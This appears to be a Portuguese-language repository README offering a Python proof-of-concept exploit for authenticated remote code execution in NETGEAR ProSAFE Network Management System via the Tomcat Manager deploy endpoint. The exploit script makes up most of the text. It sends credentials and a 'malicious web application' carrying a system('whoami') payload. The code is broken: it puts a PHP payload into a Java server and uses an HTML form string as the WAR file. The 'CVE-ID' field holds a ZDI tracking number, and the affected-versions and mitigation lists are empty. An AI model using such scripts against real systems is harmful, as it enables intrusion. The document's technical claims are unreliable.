
Prova de conceito em Python demonstrando execução remota de código autenticada no NETGEAR ProSAFE Network Management System por meio do Apache Tomcat vulnerável, implantando um aplicativo web malicioso.
Este repositório contém um script de Prova de Conceito (PoC) demonstrando uma vulnerabilidade de Execução Remota de Código (RCE) no NETGEAR ProSAFE Network Management System. A vulnerabilidade deve-se ao uso de uma versão vulnerável do Apache Tomcat no instalador do produto. Este problema permite que atacantes autenticados executem código arbitrário em instalações afetadas.
CVE-ID: ZDI-CAN-22868
Visão Geral: O NETGEAR ProSAFE Network Management System contém uma vulnerabilidade de execução remota de código devido ao uso de uma versão vulnerável do Apache Tomcat. Um atacante com autenticação pode explorar esta vulnerabilidade para executar código arbitrário no sistema afetado no contexto de SYSTEM.
Versões Afetadas:
Autenticação: Necessária
Esta PoC demonstra como um atacante pode explorar a vulnerabilidade para alcançar execução remota de código. A falha específica reside no instalador do produto devido ao uso de uma versão desatualizada ou vulnerável do Apache Tomcat.
O script a seguir ilustra como explorar esta vulnerabilidade de RCE. Certifique-se de ter as permissões apropriadas antes de executar esta PoC.
Importante: Esta PoC é apenas para fins educacionais e não deve ser usada para atividades não autorizadas ou maliciosas.
import requests
# Configuration
target_url = "http://target-ip:port/manager/html" # Change this to the Tomcat Manager URL of the target
username = "admin" # Change to the valid username
password = "password" # Change to the valid password
# The payload to be executed on the remote server
payload = """
<?php
// Payload to execute arbitrary PHP code
system('whoami');
?>
"""
# Tomcat Manager URL path for deploying a new web application
deploy_url = f"{target_url}/deploy?path=/example&update=true"
# Headers for authentication
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
def exploit_rce(url, username, password, payload):
"""
Exploit the RCE vulnerability by deploying a malicious web application.
Args:
url (str): The Tomcat Manager URL.
username (str): The Tomcat Manager username.
password (str): The Tomcat Manager password.
payload (str): The malicious payload to be executed.
"""
try:
# Create a new web application with the malicious payload
response = requests.post(
url,
headers=headers,
data={
"path": "/example",
"war": f"<form method='post' enctype='multipart/form-data'><input type='file' name='file' value='{payload}'/></form>"
},
auth=(username, password)
)
# Print the response details
print("Status Code:", response.status_code)
print("Response Body:", response.text)
if response.status_code == 200 and "Deployed application" in response.text:
print("[+] Successfully deployed the malicious web application.")
else:
print("[-] Failed to deploy the malicious web application.")
except requests.RequestException as e:
print(f"[-] An error occurred: {e}")
if __name__ == "__main__":
print(f"Exploiting RCE vulnerability at: {deploy_url}")
exploit_rce(deploy_url, username, password, payload)
target_url para a URL do Tomcat Manager do sistema alvo e atualize username e password com credenciais válidas.exploit_rce() envia uma requisição POST para implantar a aplicação web maliciosa.Para mitigar esta vulnerabilidade, tome as seguintes medidas:
Seguindo estes passos, você pode resolver a vulnerabilidade de RCE no NETGEAR ProSAFE Network Management System e melhorar a segurança geral.
Este README.md fornece uma descrição detalhada e o script da PoC para a vulnerabilidade de RCE, incluindo instruções de configuração, considerações e conselhos de mitigação.